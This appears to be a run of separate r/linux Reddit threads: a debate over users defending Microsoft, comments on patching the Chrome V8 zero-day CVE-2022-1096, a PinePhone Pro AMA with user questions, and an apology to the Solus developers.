Right now one of microsoft's biggest competitors benefits from linux and opensource.

Microsoft has failed to kill linux and opensource by fighting it, so now they are doing the three E's and have embraced social media manipulation. 

It's like taking over a religion or a group, and slowly changing how people think over time until they are against their original stance. Microsoft is shilling hard to get newer generations who are interested in opensource to love microsoft and to hate the opensource model. I have seen people call the GPL toxic. Even throwing in social justice level rhetoric and claiming that people like Stallman are problematic.

Make no mistake, microsoft is at war with linux and opensource, they still are, and they aim to win by buying out all the organizations that promote it and use it, and winning mindshare.

After all, they now hold a very powerful position on the linux foundation, which itself is slowly becoming an impotent foundation when it comes to promoting open software. They are now increasingly more concerned with social causes. Something that I do not believe is coincidental.
Microsoft has been investing in education for the last three decades. It's paying off.

The drum-beating about IT careers have produced a lot of students learning to program because they want a high salary. So they go to a university where they're wined-and-dined with free Visual Studio. Free Office 365. Free Windows licenses even. Now along the way the industry sees that OSS and Linux in particular are the way to go. So these students are being told by career counselors that all the job recruiters want you to know Linux and Python and contribute to open source projects as a way to build their resume. While at the same time are indoctrinated into the Microsoft ecosystem.

Programmers graduating from school today have never experienced a Microsoft that would not work with Linux. They don't know what it's like to deal with closed systems that you have to hack at to make do what you want.

Programmers graduating from school today got into the field because they were promised large salaries. They're less interested in the joy or zen of programming. A practical system that gets the job done quickly is more important to them than an elegant or creative system.

Programmers graduating from school today see Microsoft as a partner who will help them earn a large salary by writing code for Linux-based systems. But Linux is only a tool for them on the same level as .NET. The GPL isn't relevant to them and a non-free license that's easier and quicker to use would be preferred to even a BSD if it means having to put in more work hours. 

So when they see a criticism of Microsoft, they consider in unfair dogmatic attack by out-of-touch greybeards that jeopardizes their ability to earn a living.

**tl;dr** Kids these days aren't hackers. They're just in it for the money.

I cannot BELIEVE I'm going to seemingly defend MS here...

On what objective standard do you base Microsoft as having made these mistakes?

Why must they be labeled "mistakes"? 
[deleted]
> It was a mistake what they did to Skype (turning an open and decentralized chatting system into a centralized surveillance tool).

The funny thing is that they used Linux servers to do NSA's bidding. They needed something stable :-)
I don't think their actions are always intentional, just consequences of naiveté - at least in 2018. They've done a great job on LinkedIn so far and I think the age of M$ is over. I don't necessarily defend their actions, but I will disagree with someone if they unfairly (in my opinion), criticize 2018 Microsoft with Ballmer-run Microsoft. Though, your list isn't wrong and I'm not arguing that. 

On top of that, they're investing a lot into Linux which does help the community, and I'm thankful for that. However, that doesn't excuse wreck-less behavior with projects that have a large customer base. They appear to have grown far more careful when it comes to open-source. 
It was a mistake what they did to BeOS....when Dell was supposed to start shipping some of their hardware with that OS...If my memory serves me well...that alone was a dick move.
What MS did to Nokia was fucking evil. 


Also, DirectX is 50% API and 50% cynical market strategy. I like the idea of gaming on Linux with Wayland, Vulkan and Khronos API's specifically because it could spark a virtuous cycle of investment and development that would dent Microsoft's revenue. 
Why are so many in the ~~linux and open source~~ mturk and figure eight community becoming so irrationally defensive of Microsoft lately? <-- FTFY
These reasons are why I am switching to Ubuntu 18.10 when it releases.
based off what you're saying and the way you're describing things, it sounds like you're quite biased strongly against Microsoft, and are seemingly misinterpreting/misquoting at least _some_ of what the people defending Microsoft are saying.

There's a difference between defending most of Microsoft's actions and being some zealous fan who goes crazy when anyone disagrees with them,
OP, are you off your meds? Your post title seems anti-Microsoft (Which I'm fine with as they're an evil entity.) Then, your first paragraph defends them. Your next paragraph attacks and defends them. Your bullet points list many reasons why MS deserves all the hate they get. Then your last paragraph defends their mistakes. Am I missing a sarcasm tag somewhere?!

The Linux community should attack MS on all fronts, all the time. They are a disgusting company that plays the whole, "....lowly me..... don't pay no mind to me world, I'm just out here playing with my Tonka truck cause I don't have any friends.....nobody likes me..... :( :( :(..... wish I had a friend besides the imaginary ones I was forced to invent when my mom locked me in my closet because I wanted to read the bible..... :( :( :("

As a newbie to the Linux fold, I worry about MS's piecemeal approach to the Linux world and FOSS in general. MS is a company that is INCAPABLE OF CHANGE! They will continue down the path of obliterating any and all competition and won't be happy until every computer owner on the planet pays a monthly subscription fee for the honor of booting into Windows and using MS Office. When foreign countries move over to Linux and LibreOffice, old Billy Boy hops in the MS jet, applies a tiny bit of pressure and country X goes back to Windows/Office. If their products are soooooooooooooooooooooooooooooooo superior, why would anyone think of leaving them?

Just look at Windows 10 and all the underhanded things they did to blatantly trick people into upgrading from Windows 7! (Oh, you clicked X in the top right corner to try and back out of the update....... I'll go ahead and install Windows 10 now anyways.) Oh, you want to watch a movie you ripped...... need to pay a license fee or your monitor won't display it.

But go ahead, defend one of the biggest piece of shit companies on the planet.
I'll repeat my comment here for better visibility:

While microsoft's past misdeeds are sufficient grounds for distrusting Microsoft, their current active and deliberate eroding of the very foundations upon which open source is built is what concerns me . Microsoft is one of the companies that heavily lobbies against people's right to repair what they own, perhaps more than any other company: Just google "microsoft lobby right to repair" and see just how much microsoft is "supporting" opensource.

To me, their active attempts at taking away the very thing that makes open source possible does not only make them untrustworthy, but a menace that should be defended against.
Are there any $100B+ companies out there that got there completely clean? My theory: nope.

The only way to monopolize a market is to grind your competitors into dust. There is absolutely no clean way of doing that. While monopoly itself seems bad (and it is if you're a victim of it), think of how pervasive computing is now compared to how pervasive it was before Microsoft set the playing field (hint: it wasn't).

Google did the same shit with search engines and online advertising (they acquired TONS of adtech companies to get to their position...and still do), and Apple is doing the same thing with mobile. While that's terrible for the downstream companies that ultimately got acquired or folded (AltaVista, Lycos, Rdio, HTC), it's not like monopoly just happens.
When I say underdog you might think of the small company picking itself up by it's own bootstraps. What you might not think of is Microsoft.

When Apple rose out of the ashes and saw great success again with the Mac, they did it by stepping on Microsoft with the "I'm a PC" commercials. At the time, they spoke to the IT crowd who were quite tired of Microsoft's shit.

As with anything, if people perceive you as being the one on top and shitting on someone below you, they will always eventually view them as an underdog.

You saw this happening when your hipster friend bought a Zune. You saw it later when the guy wearing flannel at Starbucks refused the iPad in favor of the surface. You didn't even have to ask him about it, he let you know why. You're still seeing it today because Apple is still huge, and people hate them because {insert stupid reason to "hate" a company you don't have to buy from}.

Microsoft has been positioned as the underdog and has managed to maintain the position, as Apple is still huge. As long as they can be perceived as the underdog and someone can smugly feel like the enlightened person in the room for coming to their defense, people will continue to do so. People like sports teams. People love feeling superior to everyone around them. They love to act like their product choices are a reflection of that. Their fragile egos demand that they defend their choices.
No I think a child would see those things as something a bad person would do, not mistakes (If they cared or understood). Read what you wrote, those were not mistakes, they were intentional. There are good companies out there, there are good people out there too. Not everything and everybody is out to get you, not everything and everybody is out to cause harm. I understand your frustration. Let's step back a little though, and imagine you had a friend, Tom. Tom says he's a good guy. He very well might be a good guy too, you never know, right? So you decide to trust him. Things are well, you guys are friends, but them Tom fucks up. That's OK, right? Everybody makes mistakes, he's only human. Time passes, Tom still seems pretty great, but he keeps on fucking up, keeps on making mistakes and jeopardizing your guys' friendships. Even if they are honest mistakes, Tom makes a lot of them. Are you going to still be his friend? Does that sound like a healthy relationship to you?
I agree with you, and I saw this before the Github thing too. My guess would be that it's probably because they're using their software... specifically VSCode.
>It was a mistake what they did to Skype (turning an open and decentralized chatting system into a centralized surveillance tool).

Skype was centralizing before the MS buyout - they discovered that decentralized P2P networking using devices as nodes works less gooder when most of the devices on the network are phones. They had already placed so many of their own supernodes on the network well before then that no customer was ever going to become a supernode themselves again.
My biggest thing is them breaking one of tbe philosophical values of C by making their system/applications x86 only for decades and creating a huge rift in the possibility for other architectures in the general market until late.
What mistake MS did with Wunderlist ? 
microsoft is literally a part of the imperialist military industrial complex. they are a part and a key component of global capitalism. those in the free software movement who defend micro$oft are likely well paid bosses and managers who stand to materially benefit the corruption of free software by capitalism, i.e. microsoft. I hope to dear god that microsoft doesn't, say, buy Ubuntu. because Ubuntu is certainly for sale.

lool at what happened to DEC in the late 80s. fucken eviscerated by Intel and microsoft. we should have ended up with DEC and beautiful CPU ISAs and architectures and software. ken olsen is ultimately right. given what UNIX is, it is snakeoil. i have been a linux user since 2006, and we really should have something better by now.

it's all about profit and moneymaking and exploitation.
> It was a mistake to force w-10 upgrade down everyone's throats instead of simply supporting w-7/8.

No mistake here. 
There seems to be a "Type Confusion in V8" (V8 being the JS engine), and Google is urgently advising users to upgrade to `v99.0.4844.84` (or a later version) because of its security implications.

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1096
Electron Developers: "I'm gonna pretend like I didn't see that"

Seriously, just how many millions of unpatched Electron software is in use today?
As per the usual course... Ubuntu 18.04 _still_ hasn't updated (still on `99.0.4844.51-0ubuntu0.18.04.1` as of now)

The only updated to `v99.0.4844.84` seems to be the snap version. I guess that's one way to force adoption.
Does it affect chromium-based browsers like vivaldi?
Meanwhile on Google Play for Android, “all apps are already up to date, lol.” Come on, Google, fix your shit.
The cve link doesn't have any info yet. Can you provide an alternate source of info for this issue?
When was it introduced? V99? V89?
I’ve seen a lot about this 0 days but have yet to see any information on what it actually is. Can anyone enlighten me?
Can anyone explain what the holdup is on the flatpak upgrade?

The [Flathub git repo](https://github.com/flathub/org.chromium.Chromium) has a commit from yesterday updating to the patched version, but [Flathub](https://flathub.org/apps/details/org.chromium.Chromium) is still serving up the old version.
While I use primarily Firefox, I have Edge (yes, THAT Edge) as backup for a couple of sites that don't play nice with FF. And truth be told, the patched version was available within hours, at least if for those using the official MS repo.
[deleted]
CVE link is a stub. I'm curious where the information that this is for Chromium is coming from?
So my build of ungoogled-chromium 99.0.4844.74 is too old?

&#x200B;

Ah yep, opensuse updated chromium 14 hours ago, on et!  


[https://build.opensuse.org/package/show/home:Mister\_Magister/chromium](https://build.opensuse.org/package/show/home:Mister_Magister/chromium)  
Now just gotta wait for it to build, the beauty of openSUSE
Someone want to eli5 this attack to me. or more eli18 really.

JS type confusion doesn't sound too bad, it already is fucking stupid. we've all seen the WAT! video with [] + {} vs {} + [] .

I guess my point is type confusion sounds more like a feature than a bug of JS, can you explain the attack vector here.
Update to Firefox!
looks like google-chrome stable has the update on the AUR already. thanks for the heads up.   


is this issue something that'll effect windows users as well?
Is Flatpak version of Chromium updated? It was stuck at version 98 long after 99 came out.
Quick question. Does this affect Nodejs?
welp, the arch repos don't have a newer version.

&#x200B;

*guess I'll die*
damn, time to recompile brave i guess
Rpi 4 masterrace here. Just updated my chromium after reading this, thanks.
I use Arch btw😉
Heavy metals or something, i don't know i use firefox
debian 11 updated this yesterday on my desktop
Fortunately I've been on firefox for a few months.

I was very surprised to discover it performs noticeably, like immediately noticeably, better than chrome. Moving my saved passwords and replicating my cookie whitelists was a royal fucking pain, but I'm glad I did it.
How come my brave browser is already updated but I can’t seem to find any updates for my regular chromium, that’s stuck at ….84 (brave at …88), Ubuntu 21.10
is firefox affected too ???
`root@hexagon:~# google-chrome --version`  
`Google Chrome 99.0.4844.84`
Does this impact Brave?
[removed]
What about Chromium? Thx.
This is why dynamic types are bad
Hello everyone,

Lukasz from PINE64 here. Over the weekend I’ve seen many questions concerning the PinePhone Pro, so I figured I’ll take the time and answer some of them. Joining me are [FireTwoOneNine](https://www.reddit.com/user/fireTwoOneNine/) and [Aberts10](https://www.reddit.com/user/Aberts10/) who will also be answering your questions.

\[edit\] I'll be wrapping this AMA up on October 20th 6:00PM UTC, so make sure to get your questions in by then. Thank you for participating! 

Ask away.

Relevant links:

[PinePhone Pro website](https://www.pine64.org/pinephonepro/)

[Announcement blog post](https://www.pine64.org/2021/10/15/october-update-introducing-the-pinephone-pro/)
What do you think of the Fairphone? What are the similarities and differences?
Which software it comes with (firmware/drivers, OS, apps, …) is proprietary?
I didn't see any estimates on battery life. What can be expected for standard usage scenarios such as web browsing and video playback?
What got PINE64 interested in targeting Linux hardware in the first place?
Are you foreseeing any "killer app" for the Pinephone Pro that the regular Pinephone might struggle running? Emulators, some desktop app, games, etc?
The biggest question-> does it have hardware acceleration ?
Does Pine64 make money off the Pinephone/Pro orders?
I read megi's [review](https://xnux.eu/log/#047) of the PPP and it mentioned needing a closed source TF-A blob to make suspend work; can PINE64 request / work with Rockchip to get the source code of this, or at least some detail from Rockchip of what needs to be changed in mainline TF-A to get equivalent functionality in the open-source TF-A?
Does buying a pinephone help you pay for the effort? Or are you selling at cost to get the phone out to early adopters?
 I bought the pinephone because I love the project and I'm really looking forward to a fully working linux phone. Though I can't really contribute too much besides money. 

I'm waiting for the distros to mature now. It's not yet to the point I can use it as a daily driver. But getting close, please keep the hard work going. It's amazing.
How polished is android app support?
Ive used Linux for roughly 7 years now, primarily with Arch. I learn new things by jumping in and having fun along the way. 

I know the PinePhone isnt ready to be a daily driver. but would someone like me, with an informal education and a desire to tinker, be a good fit for this product?
Hey Lukasz, thanks for doing this AMA!

As this community often goes hand in hand with the Right to Repair movement: 

* What is Pine64's stance on Right to Repair?

* How repairable is the PinePhone Pro? 

* Can customers order separate replacement parts when something breaks?
What is the SoC driving the phone?
Will this be available in India and South Africa?
Thanks for the great work on the PinePhone - I'm looking forward to contributing some things for the Pro.

* Purism had to make some design decisions to avoid having proprietary firmware for training the LPDDR4 in the Librem 5. Since the PinePhone Pro also comes with LPDDR4 has the situation changed where that can be done without patent infringement or will proprietary firmware be required?

* The PinePhone had a number of hardware revisions that fixed various issues. This was quite understandable given the novelty of the device, but will the PinePhone Pro have a similar period of beta-level hardware or has more scrutiny/testing been done up-front?

* Have the speakers and aux port been improved? My PinePhone has distracting levels of noise on both at low volume, presumably from a lack of isolation on the pcb.

* Will it be able to run the Modem/Wifi without a battery?

* In terms of repair are the displays interchangeable between the PinePhone and PinePhone Pro?
First, I'm really excited for this device!

According to [the wiki](https://wiki.pine64.org/wiki/PinePhone_Carrier_Support#Verizon), Verizon should work if I swap a SIM card that is already working on Verizon from another phone.  Will VoLTE work on Verizon, too?

Also, can you comment on any plans for 5G support?
What is the warranty situation for European buyers?
How long will Manjaro be supporting this device? Is there some kind of special agreement between Pine and Manjaro or is Manjaro just what you guys chose because development was good?
can it do basic phone functions (call, sms, camera)?

Can it do more advanced smartphone things (GPS, browser, native apps)

Is there a plan on developing an emulator so android/iOS apps can run as well?
Will there ever be a PinePhone that can compete with current (700-1000€) flagships?
Is there plans to have a touchid or faceid feature to unlock future phones ?
Not a question, but I appreciate you guys keeping the hardware toggle buttons. That is the main selling point of the phone for me. Keep up the good work
This is a bit off topic from the PinePhone Pro. Are there any plans to integrate 802.11ah ("Wi-Fi HaLow") to any future Pine devices (like the PineCom)? There are some chipsets now out on the market, and 802.11ah functionality would compliment nicely with LoRa.
Hey, u/Luke_Pine64, great for doing an AMA :)   
Out of curiosity - any interest from Lakka devs towards the PinePhone Pro?
No question, just want to say I really appreciate Pine's transparency in honesty in its business. It is refreshing to see a company sell products for what they are without overhyping them.
hello!!

are there plans in the future for external kill switches! is the SOC replaceable / upgradable?

thank you so much!
i'm looking into buying a pinephone because i want to see a mainline linux phone become reality. thanks for making this possible

my question is: what is the best way for me to help the devs? to be honest, i don't have time to lurk on IRC and join mailing lists and submit bug reports. is there some really simple way to collect debug data and send it where it needs to go without having sign in to some website and fill in a bug report?
The biggest thing that held be back with the OG pinephone was the hardware. This has almost entirely been solved with the Pro, I would prefer a better camera. I think you've previously sold upgradeable modules for the OG. Do you think an upgraded camera module would be sold? I'm ok with buying a phone and upgrading the camera module myself.
What’d be the chances of having an option for a modem that would support more us specific bands (2, 66, 71, etc)?
What cell carriers does this work with? I'm in the US, but idk if others in diff countries might also have this q.
Will it function as a telephone?

(why do I have to ask that when new Linux phones are announced?)
Can I actually get it?, its great to announce things but when can I get it in my hand. In Australia
Hi! Your phone looks awesome. Does it support the mobile network switching protocol that google fi uses?
What is the "explorer edition" that ships in 2022, how will it differ from the units shipping in December 2021?
Do you think a regular android user could use pinephone as a daily driver, or is it still a bit early for that?

Like in my case, i mostly browse reddit/mastodon/twitter, read emails gmail/protonmail and browse internet. Am i able to do that just fine with pinephone(pro)?
[deleted]
Any updates or thoughts on the "PinePhone 2" and maybe "PinePhone 2 Pro"? Is it early to comment?
Very excited about the phone. 

Do you use the phone as a daily driver? 

Off topic:
When is the community edition of the pinebook releasing?
Are there future plans on a riscv pine phone?
Hey @luke_pine64 — Any plans for dual-SIM support?
What's the best way to get into developing for mobile Linux?
Are there plans to use eventually use a CPU that can support large ram amounts?
You said in one of your comments that it ships with manjaro. How easy would it be to install an android based distro and what advantages do people get from it shipping with non-android Linux by default?
Very excited for the Pinephone Pro. I intend to ensure am app I'm working on works on mobile and specifically the Pinephone to hopefully jump into the queue.

My question; it's been a while since we've seen many updates on the Pine Cube.

I know that's run close to the hardware in the Pinephone, SOC similar, OV5640, etc. I've been toying with my Pine Cube and excited with the new PPP for future updates to come to the Pine Cube.

Thanks again. Pine is an inspirational company.
Have you done, or are you planning on doing any work with regards to having a more ethical supply chain like that of the fairphone? I think it's something more phone companies should value.
Are there any works on improving the picture/video quality captured through the camera?
If yes, then is it just hardware upgrades or software upgrades too?
[deleted]
Forgive me if this has been answered already.

Can the PinePhone Pro (or baseline PinePhone) replace my feature phone for all of my talk and SMS needs?
Any chance it will be able to run [Signal](https://play.google.com/store/apps/details?id=org.thoughtcrime.securesms&hl=de&gl=US)? It's the main thing keeping me back from getting it as daily driver
Very excited for this. I will certainly be purchasing one, and upgrading from my iPhone 5 I’ve had for years. 
Really excited to try ExpidusOS. Void is my #1 favorite distro so it would be amazing to have something similar on my phone.
Do you foresee the PPP being daily-driver ready from launch? If not, what do you think is the main challenge which the software will have to overcome before people could comfortably be able to pick one up for use as a basic phone.   


(\*Caveat - i'm not talking about being able to do all the things a modern iPhone does, all at the same time, etc. Just be able to reliably receive and make calls, exchange SMS and MMS, be able to run a relatively stable browser is a more-or-less quick fashion. You know, the sort of stuff one could expect from a several years-old Android, for instance?)
Will we see a secure element in the future?
Is there any chance that there will be a 5g modem upgrade in the future?
I’m not a Linux developer (but I am a software developer). However, I am a Linux enthusiast and I know my way around Linux. Is getting the early adopter version recommended?

Also, I apologize for the off-topic question, but I still haven’t received news about my support ticket regarding the OG Braveheart edition I bought on launch that gave up on me just minutes after turning on :( It’s been almost 2 years already. Is creating a new ticket enough or is there a specific person I need to get in touch with?

Either way, awesome project, and I really support all you people making this possible!
Is it possible to buy the better back camera as a spare part and use it as a selfie camera?
I nearly signed up for one the other day, but I don't have any relevant Linux phone experience (I'm a server side engineer) and the form put me off.

Should I sign up now or wait until they're more widely available?
Do you guys have a recycle program? If so, I'd like to send you the defective pine book I have that I didn't even get to use. Just send me a label and you can have it.
Why manjaro instead of vanilla arch?
Has everyone received their previous PinePhone yet?
Are they any efforts towards sustainability or ethical manufacturing? I love the idea of a Linux phone, and have been watching the PinePhone and Librem5 for a long time. My only concern with both of them is about environmental and social impact. The Fairphone has therefore been on my radar for a long time as well. I also just recently dound Nimble for chargers and charging cables. I'd love to see more collaboration between the FOSS/open-hardware folks and those focused more on sustainability. Could you talk at all about the company efforts towards sustainability and ethical manufacturing?
Hey! Super excited to get my hands on one once the non-developer wave goes out.

Are you guys planning on doing, say, an $800 device at some point that targets modern high end flagship specs?
Will you be offering a bigger battery on this model?
Will this be available in South Africa?

And how would someone get involved in software development for the pinephone?
Some questions about daily use:

- Android Step counter apps work? or should be native apps.
- similar with gps apps like Strava, should be native?
- How it is the sound quality to listen music?
How would security compare to say, a Google Pixel with LineageOS installed?
What are some reasons to switch to the PinePhone? I‘m using an iPhone 7 since the release and I‘m going to get a new phone sometime in the next months.
Will you guys ever make your own Linux distro speciffically designed to run on low-end phones?
I'm happy that this one still  has a headphone jack!

What do you think about the Fairphone dropping that?
Joke: when's mine shipping?

Actual: 

* what's the GPU perf like? "mobile-ish" or "could almost maybe not be bad for light gaming"?
* Is the battery form factor the same?
Any chance of being available to ship to Russia?
What would be practical use for this phone in regards to terminal work? I'm familiar with the Termux app but with this being a pure Linux driven handheld device, I'm curious of how it could tie into one's everyday work.

Thanks!
Do you have plans for release a new Arm laptop ?
In one of the videos and on some pictures I saw a docking station. Is that available too?
Do you think that you guys will be able to make a Linux phone that appeals to the mass market?
Can you please put the headphone port back?
Will any Pine products be available in Asia/India?
What language/sdk is recommended for app dev?
When will pinetabs be back in stock?
Will it be compatible with sims from Australian providers such as Telstra? Is it available in Australia? The first one could be a stupid question, I’m not sure… Sorry if it is!
When do you think we'll have a full functional linux phone just like the android phones from Samsung, Google and co. ?

At the mean time, we can say that Linux on desktop can replace windows or MacOS (with companies like System76), but we can't say the same about phones.
Is there a technical limitation why only 1440x720 screen? Or was it purely for cost saving?

Would using the RK3399S in the PineBook Pro yield any advantages like longer battery life? If so, is that planned?
are there any plans to eventually make a direct competitor to Apple and Android?

Obviously you guys have built up your reputation for selling machines with a lower cost but I was wondering if there were any plans to expand and make a flagship?
Any chance of a keyboard case, slide out type of thing. To make it easier to take notes, etc
I am mostly past my tech hobby days, and use mostly apple stuff, but damn do I love this company! A couple kids I know use these, all of them have developer dads- seems like a great use case, and keeps them off malware games etc.  
this release makes me really tempted to switch to one, I LOVE the modularity, and mobile Linux is such a cool concept. All that to say, best of luck to you guys and keep it up Luke!
How usable is it out of the box? I mean, I bought the OG pinephone, and the default manjaro-kde combo was straight-up unusable. I know this phone is mostly targeting techy people, who have no problem flashing a distro of their choice, and customizing it to their liking, but most people I know would have just thrown it into the trash after 5 mins of use. How choppy is the system UI? Video playback? Will KDE mobile bugs be resolved by launch? It would be nice if normal people could use it too by default.

The phone was a nice toy for me, and I had a great time with it, I just couldn't use it for anything serious, so I ended up selling it. Will this be different?
What’s the price of the pinephone pro?

Not a question but I am saving up for my pinephone so I can use mobian with it :)

Very excited
Will there ever be a real killswitches for camera/microphone etc on the side, not inside where it's hard to access them
I ordered a regular pinephone a week or so ago and I've seen no notification that it's shipping anytime soon. Do you know what's going on?
will there be some sort of android app emulation like Wine? i don't use alot of apps, i just use youtube, reddit, twitter, and discord so i was considering this phone.
can it run (virtualized or possibly emulated) android - I need certain apps for school work so I would need this?
I am interested in the products from the repairability POV and I don't care about bringing inferior desktop experience and the inferior OS design of desktop OSes including GNU/Linux systems, even though I can see the enthusiasm of the community. In the last 5 years the industry is simply regressed in almost every aspect of repairablity and modification of the hardware and software. So I see Pinephone as a compromise.

I am interested in Pinephone Pro if I can install proper Android on it (with maybe open source drivers like Mesa opengl instead of vendor binaries). Are you planning to support developers who develop an AOSP fork (e.g. Lineage OS) on the phone?
For 400 bucks is expect more than a Noname hexa-core and 4 gb of RAM. One can get a phone with like 3 times the performance for that price and it's going to run quicker, with likely a longer battery life and actual support for apps. 

Why do you think this product makes any sense - outside of the bubble of what looks like a hundred people who are desperate to run Linux on a phone? And isn't it a bit embarrassing that people ask if that thing has hardware acceleration - in 2021?
Will it be available in Spain?
will this be available is brazil?
Will it be available in South America?
The previous model pinephone one thing I noticed well before this event happened is that the phone would get really hot in my pocket.  
I did this on Mobian Phosh, and I enjoyed it for the month that I used it, and I probably would still honestly daily drive it if I wasn't getting Samsung Galaxy Note PTSD (I had one explode). Is this still an issue? I mentioned it a few times in the irc room but never really stuck around waiting for a response.
Are there any prohibiting factors preventing the use of a Qualcomm soc, aside from cost, which could leverage adreno, and hence, freedreno gpu driver which seem to be more mature than mali ones, at least in terms of open source drivers.
Perhaps I'm too late, but this matters to me: how is the shipping situation to Brazil? Pine64 products are the only Linux products that are actually affordable in our market/currency, but my country is well known to have exorbitant taxes that can drive manufacturers out.
Would it be available in Russia?
Any plans on using the same SoC to make a PineTab Pro?
Is a higher-end model being considered? I think a PinePhone Pro but with 6GB RAM and a 1080p display would be much more appealing.
www.freetibet.org/about
Have you given any thought to creating a laptop shell that can be used with the pinephone (or general usb-c)?

While the pda-style keyboard is amazing, its not as effective for using for multiple hours when you’re ob the go.

Something like a nexdock or project linda (razor) that can extend the capabilities of the pinephone to provide a complete laptop experience would probably the peak of mobile convergence. 

However, given that it will probably cannibalise a lower end pinebook, I’m not sure how financial sensible it might be.
Is there any way to achieve complete privacy with the PinePhone whilst in use. That means no pinging cell towers, Wi-Fi networks, or Bluetooth devices, all without putting it in a faraday bag?
I've noticed that the SOC is (essentially) the same one as in the Pinebook Pro. If this is the case, will it be using something more like the Pinebook Pro's stack instead of the OG Pinephone's?
What would I need to do to get a job with Pine64? What are recommended qualifications?
Is it going to be available in Turkey?
what are the differences between pinephone and android phone?
When will we get worldwide shipping, specially South East Asia?
Are there any plans for a "fairbook", an ARM notebook sort of analog to the M1 mac?

Aside from that, you do a wonderful job and the initiative of linux-focused embedded hardware is awesome. Keep up the good work :)
Hey Lukasz, 

Since you were able to fit rk3399s into phone form factor, will there be a long-promised conversion kit for original pinebooks? I'd really love to upgrade my original pinebook to rk3399 :)
I suppose android apps aren't natively supported? Is it a plan for the future?
Have you guys considered moving the hardware switches from the back of the phone hidden behind the panel to the side of the phone like the Librem 5 so that they can easily be accessed?
Not a question:

I need a new phone and want one with kill switches.
How do I get my H64B to boot directly from USB storage without a microSD card? :)
Some of you may have seen a thread I made here yesterday about the Solus devs censoring opinions.

Well, after a nights sleep and looking back on it in retrospect, I came to the glaringly obvious conclusion that I was not just being an asshole, but a fucking douche lord full of arrogance and narcissism (specifically to /u/joshstrobl, who didn't deserve any of that shit).

I can offer no excuses for myself that wouldn't simply be insulting. I was just a straight up dick for no good reason, for which I am deeply sorry (like that makes up for it...)

If any of you read my bullshit and thought there was a shred of truth, or thought badly of the Solus devs, please don't. They're actually some really awesome people, and don't deserve to have their reputations needlessly tarnished by people like me.
Shit happens and there is lessons learned on both sides. Personally I could've just gotten my ass out of bed, sat down, and formulated a response instead of deleting your comment, and I could see how it'd be misconstrued as censorship by outright deleting it and not taking the time to actually give you an appropriate response, so apologies for that.

In terms of the post itself, I don't hold any resentment for it, and you're always welcome to post on our IRC, r/SolusProject, etc. if you need help with your experience (assuming you use Solus or opt to try it).
Hey people have bad days.  Recognizing it and trying to correct it is an exact reason why you're not an asshole.  That's futher than a lot of people go.
Nice post.  It takes a big person to admit wrongdoings and apologize like that.  I did not see your previous post.  

Everyone has a bad day.  Oh, well.  I hope you have a good day.
Good on you to be brave enough to admit fault.

When I saw the post title I though maybe, just maybe, cbmuser had renounced his Solus flaming.
Nod two times if they got your wife and kids.

j/k, I didn't read any of this, but this apology post got you some respect from me. Few people recognize when what they said is wrong, even fewer choose to apologize.
I've used Solus for a little more than a year. I met Ikey on Reddit and got into a fight with him about using LSI vs just using the native Steam runtime files. He was right and I ended up trying Solus as a result. Been on it since. Also became a Patreon.

We all have bad days =p

(P.S. I miss frequent dev interaction on social media. I understand why that went away though. I've read the posts)
I think hell just froze over. A member of the open source community not only acknowledged the feelings of another human being but also owned up to his mistakes like a fucking adult. Kudos to you, my friend.
A good man admits he made a mistake.

A great man admits he made a mistake, to the world.
Ikey is a remarkably skilled developer, and the fruits of his labor bear that out. Solus is phenomenal. I don't use it, but I have enough experience with it to recognize its polished elegance. 

Here's the caveat: Ikey has a tendency to receive *technical feedback* as a personal affront, and he's quick to take a combative posture. To his credit, the worst instances I've seen of him behaving this way was in response to uninformed, or otherwise misguided remarks from users. To be honest, I'd probably respond in a similar vein if I were in his position – but I'm not in his position, he is. I would never pursue a leadership role like his, for precisely that reason. 

But as the leader of a community, it seems highly counterproductive to react with knee-jerk hostility in the face of well-intentioned, albeit ignorant or otherwise less-than-glowing reviews of his work. 

This is just my point of view. Ikey's probably forgotten more about Linux development than I've ever known, and I respect the hell out of him as a developer. But as an ambassador for Solus, his general disposition is one of exclusivity. The atmosphere in the Solus forums tends to be one of "If you love Ikey's work, you're welcome, and if you have any criticism of any kind, shut up."

_______________

#Edit: 

Sorry I realize I went on something of a tangent. To bring this full circle to OP's experience, what I'm saying is if the Solus forums are anything like what they were when I browsed them approx. a year ago, I can totally understand why someone would lose their patience and lash out at the mods. It was not a hospitable atmosphere to anyone whose mindset fell much short of "Solus is immaculate, eopkg is God's gift to mankind, and that God's name is Ikey." Maybe things have changed in the intervening year. Hopefully they have. Solus deserves a healthy, inclusive community. 
Did the devs hack this guys account?
are you under duress right now/? BLINK TWICE IF THEY'RE IN THE ROOM!
Well, this is ...refreshing.
Didn't see your post, but I'll take your word for it.

You da best and I love you. Not many people have the balls to (publicly) apologize for something they did.
This kind of maturity in the Linux community is exceedingly rare..
So how did you guess this guy's Reddit password?
Where is this thread you speak of?
go away kevin
Link to the old thread? What happened?

EDIT: Ahh https://www.reddit.com/r/linux/comments/90t5ni/the_solus_devs_appear_to_be_utilizing_censorship/
Nice post. Respectable. However,

The difference between a clever man and a wise man is that a clever man can get himself out of a situation in which a wise man never would have found himself in, in the first place. 

Learn from it. Move forward and be wise, my friend. 
Good. Now bend the knee.
What kinda slice the got on you?
Still self-centered, maybe you should have told them directly this instead of making a post about you.
Oh yes, you were being a massive over dramatic cunt with a tinfoil hat on your head.

Edit: LOL, Love how people are downvoting me for something OP thinks of himself as well. Get a grip, people.
If every user that was an asshole made an apology post it would have one of those at least once a day hahahaha

Good on you for taking this step, OP. I kind of wish people weren't assholes to begin with though
Mostly I post short, critical messages without positive feedback. Your post inspires me to think the other way. Instead of criticising I'll attempt to be more positive and suggest improvements instead of just pointing out things I think are wrong. Thanks. /humanbeingbro
Well done on seeing it, I have to give credit where it's due
I would like to see more people like you :) maybe "people like you have been" is more accurate
Upvoted for coming to your senses & being honest about it.
Hey it's OK. It's important that you can introspect this well - it's an important quality. Also, mods now made a sticky about it, so they now have a little bit of an easier job =)
IMO, arguing online is the worst thing that you can do with your time. You will never gain anything from it and won't solve any problems. If someone responds to me with a b8 or whatever, I simply ignore and don't respond.
it takes alot of courage to admit you messed up. dont worry too much, everyone makes mistakes and its nice that you came around by yourself and willingly admited your mistake \^\^
> I was just a straight up dick for no good reason 

You will fit in really well on reddit :) /s
Well done, takes a big man to admit when they fucked up and acted out in a way on which reflection seems dickish to even themselves. 
Nice to see a post on an online forum where someone recants what they said previously in another thread. Rare post. Nice!
I hope you leaner your lesson - think before speak.
It's all good if you realize your mistake 🖒
